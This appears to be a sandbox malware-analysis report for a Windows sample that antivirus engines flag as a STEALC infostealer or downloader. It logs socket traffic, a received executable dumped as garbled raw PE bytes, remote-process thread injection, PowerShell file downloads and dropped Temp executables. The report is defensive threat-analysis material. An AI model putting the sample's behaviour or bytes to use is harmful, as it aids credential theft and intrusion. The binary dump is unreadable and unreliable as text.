 buffer: FBA«'BIËéb9¯i}ÛçH¸œ¬Òæ[nl úþ »zغ-­ íÿºÒù‰Ù‘Þ~öÄÂ7ƒ½Mâ’TcؐÂ@0Îw¾Tm¨†ª j®­˜8ïaÿ:6ó—^ÿ÷ƒtu‘ªÏaãöÙQž+R¬°ýQ-
socket: 1420
sent: 134
1 134 0

send

 buffer: €ã"@!ÍÇYùÇ7Ñic”‡6Ê[=õ>ñ{`X"ÆC+mm‰.džþVõÿã?s BŒ’‹äÔüzü±69ªíYûا)1o›(‰“.”Ô²RŽö%¼…– aÁŸYŠFGÈî´)‚ºíЯÀüâäôšãí®UQ8JÁ†»O± Ë
socket: 1420
sent: 133
1 133 0

send

 buffer: rnf,i {ge`Š|HaW£$ˆ‘­px"i^ïngê߬Ò/5 ÀÀÀ À 28-ÿmonoblocked.com  
socket: 1932
sent: 119
1 119 0

send

 buffer: FBA.mµJ­`&.ê5¿0d|Ûû/±”xMl# Ηô=;ñ]üÖãw yH.Ô½“ŠÚ:ê&RÙïŠ40d2lxàÇ•ë•À"tLÙ[^§÷h†·2üc-h§HFÚsJqe/ÅföwÇd
socket: 1932
sent: 134
1 134 0

WSASend

 buffer: GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com
socket: 2008
0 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Sat, 27 Apr 2024 02:54:57 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Sat, 27 Apr 2024 02:45:01 GMT ETag: "6be01-6170b01c1a262" Accept-Ranges: bytes Content-Length: 441857 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $ÔKuº[Kuº[Kuº[F'e[Uuº[F'Z[Ãuº[F'[[duº[B )[Huº[Ku»[;uº[þë_[Juº[F'a[Juº[þëd[Juº[RichKuº[PEL|Pdà  zÄA0@ÀÅö€ô“(0Ä%k ÅT28Ȉ@0Œ.text“ `.rdataÎl0n@@.data(‰Â °Œ@À.rsrc%k0Äl<@@.relocT Å¨@B¹Lèuh‰(Aè_'YùTèÈh(AèI'Yù@èhu(Aè3'YÃj¹HèÃj¹<èÃj¹PèûÃj¹DèîÃÌÌÌÌÌÌÌÌÌÌU‹ìQQƒìòL$ò$èXÝ]øòEøƒÄ‹å]ÃU‹ìQQQQò$èø Ý]øòEøYY‹å]ÃU‹ìVE‹ñPèUÇ”QA‹Æ^]ÂÇ”QAé U‹ìV‹ñèêÿÿÿöEtVè¦(Y‹Æ^]ÂU‹ì‹E ]ÃU‹ì‹E€8u3À]ÃPè§!Y]ÃU‹ìƒ}u‹E]Ã]é`U‹ìƒ}u‹E]Ã]é U‹ì‹E Š‹Eˆ]ÃU‹ì‹E‰‹Á]ÂÇ”?A‹ÁÃÇ”?AÃU‹ì3À;M”À]ÂU‹ìV‹ñèßÿÿÿöEtVè(Y‹Æ^]‹ËAÃU‹ì‹E‰‹E ‰A‹Á]‹ËAÃU‹ìW‹ù‹MèîÿÿÿP‹Ïèæÿÿÿ‹Èè“ÿÿÿ„Àt‹MVèÏÿÿÿ‹Ï‹ðèÆÿÿÿ;Æ^u3À@ë3À_]ÂU‹ìQÿu ‹Mè’ÿÿÿ‹E]ÂU‹ìQQÿu ‹UøÿuRÿP ‹Èè‹ÿÿÿ‹å]ÂU‹ìV‹ñ‹MèXÿÿÿP‹Îèÿÿÿ^„Àt‹Mè@ÿÿÿ;E u3À@ë3À]ÂV‹ñèêþÿÿÇ°?A‹Æ^øü†AÃU‹ìQÿu ƒeüè Y…À¹‡AEÈQ‹Mè± ‹E‹å]ÂU‹ìV‹ñèöEtVèÏ&Y‹Æ^]Âé’þÿÿV‹ñèÿÿÿÇÌ?A‹Æ^ø‡AÃU‹ìQƒeüƒ} u‹Mh ‡AèQ ë ÿu ÿuèoÿÿÿ‹E‹å]ÂU‹ìV‹ñèöEtVèb&Y‹Æ^]ÂéŽÿÿÿV‹ñè"ÿÿÿÇè?A‹Æ^ø8‡AÃU‹ìQÿu ƒeüè_Y…À¹‡AEÈQ‹MèÛ‹E‹å]ÂU‹ìÿu è Y…Àtè>ëè=‹MPÿu èôýÿÿ‹E]ÂU‹ìV‹ñèöEtVèÊ%Y‹Æ^]Âéöþÿÿ¸Lø@Áá4ïÆÃ)ÃU‹ììP=0”SV‹ñW‰u܋‹~‰]èuj…°÷ÿÿPjÿP0A¡³AMðƒeð‰EࡳA‰EÐè¤ÿÿÿ‹Uð‹ ³AÂ?¡³Aj ‰Uð‰MԉEØ^ÇEäƒEä‹ÃÇEô@.ëíÁàÁ=0©‰Eü¡,DEôƒeô=0ë£,¡ DEô£ ‰Eô‹EèÁè‰Eø‹Mü3Û3Mô‹EøEØ3Á‰Mü‹ 0Ç(î
received: 2600
socket: 1936
1 2600 0
Process injection Process 2124 resumed a thread in remote process 2504
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000088
suspend_count: 0
process_identifier: 2504
1 0 0
value Uses powershell to execute a file download from the command line
value Uses powershell to execute a file download from the command line
value Uses powershell to execute a file download from the command line
value Uses powershell to execute a file download from the command line
file C:\Users\test22\AppData\Local\Temp\i1.exe
file C:\Users\test22\AppData\Local\Temp\i3.exe
Bkav W32.AIDetectMalware
Lionic Trojan.Win32.Agent.Y!c
Skyhigh BehavesLike.Win32.Dropper.ph
Cylance unsafe
Sangfor Trojan.Win32.Agent.V0ui
VirIT Trojan.Win32.Genus.VIN
Symantec Trojan.Gen.MBT
APEX Malicious
McAfee Artemis!705685A8DEAC
Avast NSIS:PWSX-gen [Trj]
Kaspersky HEUR:Trojan.Win32.Agent.gen
TrendMicro TrojanSpy.Win32.STEALC.YXEDYZ
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.705685a8deace858
Sophos Mal/Generic-S
Webroot W32.Trojan.Gen
Kingsoft malware.kb.a.874
Microsoft Trojan:Win32/Phonzy.C!ml
ZoneAlarm HEUR:Trojan.Win32.Agent.gen
DeepInstinct MALICIOUS
VBA32 suspected of Trojan.Downloader.gen
TrendMicro-HouseCall TrojanSpy.Win32.STEALC.YXEDYZ
AVG NSIS:PWSX-gen [Trj]
Paloalto generic.ml